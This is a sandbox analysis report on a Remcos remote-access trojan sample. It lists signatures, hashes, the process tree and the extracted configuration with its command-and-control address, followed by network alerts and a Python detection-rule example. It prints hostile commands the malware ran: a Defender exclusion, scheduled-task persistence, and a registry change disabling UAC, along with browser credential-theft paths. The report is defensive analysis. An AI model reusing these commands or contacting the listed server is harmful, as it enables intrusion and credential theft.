Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1576998
MD5:065a6053492ecc989755413d4b9cffea
SHA1:9955cde6556837bc877e596c5b206df39d060a00
SHA256:be5fbed126be0685414464f8d18c42027cbb09c884640c35e2420f96c0d254df
Tags: NET, exe, MSIL, user-jstrosch

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 065A6053492ECC989755413D4B9CFFEA)
    • powershell.exe (PID: 2580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 5952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • DcBNSgyxoJFip.exe (PID: 4864 cmdline: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe MD5: 065A6053492ECC989755413D4B9CFFEA)
    • schtasks.exe (PID: 1280 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 3048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T6WK9E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
(22 entries in total)
Source | Rule | Description | Author
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
12.2.MSBuild.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
12.2.MSBuild.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
(28 entries in total)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe, ParentImage: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe, ParentProcessId: 4864, ParentProcessName: DcBNSgyxoJFip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", ProcessId: 1280, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", ProcessId: 5692, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", ProcessId: 5692, ProcessName: schtasks.exe
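The Sigma matches in the System Summary and Persistence sections above all come from process-creation telemetry: PowerShell adding a Defender exclusion for the dropped copy in AppData\Roaming, and schtasks.exe registering a task from an XML file in the user's Temp directory, both spawned by a binary running from the Desktop. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma project's own rule code; it reimplements that logic over constructed Sysmon-style events whose command lines are copied from the report's process tree, plus two benign control events that must not fire. The MSBuild heuristic is my own assumption, suggested by the report's "Injects a PE file into a foreign process" signature and the argument-less MSBuild.exe children in the tree, and is not a rule listed on the page.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / Security 4688 fields)."""
    image: str
    command_line: str
    parent_image: str


# Constructed events. The first three reuse the command lines from the report's
# process tree; the last two are benign controls that must not fire.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
        r'-ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"',
        r"C:\Users\user\Desktop\file.exe",
    ),
    ProcEvent(
        r"C:\Windows\SysWOW64\schtasks.exe",
        r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" '
        r'/XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"',
        r"C:\Users\user\Desktop\file.exe",
    ),
    ProcEvent(
        r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
        r"C:\Users\user\Desktop\file.exe",
    ),
    ProcEvent(  # benign control: admin registers a task from ProgramData via cmd.exe
        r"C:\Windows\System32\schtasks.exe",
        r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"',
        r"C:\Windows\System32\cmd.exe",
    ),
    ProcEvent(  # benign control: reading Defender settings is not an exclusion change
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-MpPreference',
        r"C:\Windows\explorer.exe",
    ),
]

# Locations a standard user can write to; a task-registering parent here is suspicious.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Temp locations a task definition XML should never legitimately come from.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%", "%tmp%")


def defender_exclusion(ev: ProcEvent) -> bool:
    """PowerShell adding or changing a Defender exclusion (Add-/Set-MpPreference -Exclusion*)."""
    cl = ev.command_line.lower()
    return (ev.image.lower().endswith("powershell.exe")
            and re.search(r"\b(add|set)-mppreference\b", cl) is not None
            and "-exclusion" in cl)


def schtasks_xml_from_temp(ev: ProcEvent) -> bool:
    """schtasks /Create whose /XML definition file lives in a temp directory."""
    cl = ev.command_line.lower()
    if not ev.image.lower().endswith("schtasks.exe") or "/create" not in cl:
        return False
    m = re.search(r'/xml\s+"?([^"\s]+)', cl)
    return m is not None and any(t in m.group(1) for t in TEMP_DIRS)


def schtasks_user_writable_parent(ev: ProcEvent) -> bool:
    """schtasks /Create spawned by a binary running from a user-writable path."""
    return (ev.image.lower().endswith("schtasks.exe")
            and "/create" in ev.command_line.lower()
            and ev.parent_image.lower().startswith(USER_WRITABLE))


def msbuild_without_project(ev: ProcEvent) -> bool:
    """Heuristic (my assumption, not a rule on the report page): MSBuild.exe started
    with no project file by a parent in a user-writable path, the shape a
    process-hollowing host takes."""
    if not ev.image.lower().endswith("msbuild.exe"):
        return False
    args = re.sub(r'^"[^"]*"\s*', "", ev.command_line.strip())  # drop the quoted image path
    return args == "" and ev.parent_image.lower().startswith(USER_WRITABLE)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("defender_exclusion", defender_exclusion),
    ("schtasks_xml_from_temp", schtasks_xml_from_temp),
    ("schtasks_user_writable_parent", schtasks_user_writable_parent),
    ("msbuild_without_project", msbuild_without_project),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every rule that fires on every event."""
    return [(name, ev.command_line) for ev in events for name, fn in RULES if fn(ev)]


if __name__ == "__main__":
    for rule, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32s} {cmd}")
```

Run against the sample, the three report-derived events produce four hits (the schtasks event trips both the temp-XML and the user-writable-parent rules, mirroring the two Sigma rules the report lists for it) and neither control fires. Note that the Image field on the report's events is the SysWOW64 copy of each binary even though the command line names System32: the 32-bit sample is redirected by WOW64, so match on the file name, not the full path.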

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: 69 7B 63 7C 31 0D A6 FA AF 7C E7 E5 BD C2 17 5F 50 EB 46 A9 DF 8A 0B 84 F7 1E 25 1A 10 ED A9 AF ED B8 0C 52 7A 47 FB 83 8E 11 DD C0 A6 12 1D 4F 20 12 60 D4 3A 89 45 86 8B 68 B0 C5 5C 0D 45 D8 B7 56 56 6D 5E 61 2F CC 2A D6 A8 77 0F CF 6A 24 58 A5 D9 98 49 4E BE 04 40 C8 BB A8 16 33 6B 35 49 C0 0C 7A 4C 95 D9 08 73 8E B8 10 5A 57 FF 58 87 C7 06 FD , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 5952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-T6WK9E\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T20:38:09.344301+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:12.444320+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:15.518949+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49716 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:18.610683+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49727 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:21.715391+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49734 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:24.782070+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49742 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:27.881882+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49754 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:30.956422+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49760 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:34.048077+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49771 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:37.143338+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49778 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:40.216592+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49787 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:43.296588+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49795 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:46.391546+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49801 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:49.467800+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49807 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:52.545169+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49819 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:55.639326+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49825 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:38:58.751342+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49836 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:01.830463+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49842 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:05.201258+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49847 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:08.281636+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49856 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:11.357782+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49862 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:14.436701+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49868 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:17.534922+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49876 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:20.607286+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49882 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:23.685542+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49891 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:26.818834+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49897 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:29.893329+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49905 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:32.972717+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49915 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:36.088841+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49920 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:39.203367+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49930 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:42.305102+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49937 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:45.378722+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49945 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:48.456780+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49953 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:51.515278+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49960 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:54.514301+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49969 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:39:57.486941+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49977 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:00.438107+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49983 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:03.398647+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49992 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:06.319130+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49998 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:09.204763+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:12.072763+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50010 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:14.880802+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50020 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:17.655565+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50026 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:20.406464+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50032 | 107.173.4.16 | 2560 | TCP
